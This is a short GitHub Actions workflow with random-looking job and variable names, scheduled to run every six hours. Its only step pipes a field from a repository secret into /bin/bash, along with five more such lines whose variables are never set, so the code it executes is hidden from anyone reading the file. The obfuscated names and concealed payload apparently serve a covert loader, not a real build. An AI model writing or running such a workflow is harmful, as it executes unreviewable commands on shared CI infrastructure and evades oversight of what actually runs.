name: midayuan3810
on:
  workflow_dispatch:
  schedule:
    - cron: '43 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: midayuan3810
        env:
          urk17: ${{ secrets.urk17 }}
        run: |
          echo $urk17 | jq -r .ena10325 | /bin/bash
          echo $uzsj380 | jq -r .yl81 | /bin/bash
          echo $oduto886 | jq -r .cli56165 | /bin/bash
          echo $oijn3525 | jq -r .ynkm5 | /bin/bash
          echo $tmkkj6073 | jq -r .zh8 | /bin/bash
          echo $cywjt75729 | jq -r .iqz0777 | /bin/bash

